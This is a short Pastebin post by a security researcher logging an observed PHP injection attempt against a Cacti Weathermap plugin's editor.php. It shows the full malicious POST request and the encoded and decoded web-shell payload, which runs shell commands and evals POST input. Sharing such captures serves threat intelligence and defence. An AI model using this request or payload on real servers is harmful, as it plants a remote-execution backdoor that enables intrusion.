Neonprimetime

PHP Injection attempt

Sep 22nd, 2016
205
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.40 KB | None | 0 0
  1. Malicious PHP Injection attempt
  2. *************
  3. POST /plugins/weathermap/editor.php?plug=0&mapname=Netmaps.php&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=%3C?php%20echo(md5(a));%60$_REQUEST%5Bb%5D%60;@eval($_POST%5Bc%5D);?%3E&map_legend=Traffic+Load&map_stamp=Created:+%25b+%25d+%25Y+%25H:%25M:%25S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name HTTP/1.1
  4. User-Agent: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705
  5. Accept: */*
  6. Accept-Language: zh-cn,en-us;q=0.5
  7. Host: www.mysite.com
  8. Connection: Keep-Alive
  9.  
  10. ******
  11. php injection code
  12.  
  13. encoded
  14. %3C?php%20echo(md5(a));%60$_REQUEST%5Bb%5D%60;@eval($_POST%5Bc%5D);?%3E
  15.  
  16. decoded
  17. <?php echo(md5(a));`$_REQUEST[b]`;@eval($_POST[c]);?>
  18.  
  19. ******
  20. More FROM @neonprimetime security
  21.  
  22. http://pastebin.com/u/Neonprimetime
  23. https://www.virustotal.com/en/USER/neonprimetime/
  24. https://twitter.com/neonprimetime
  25. https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment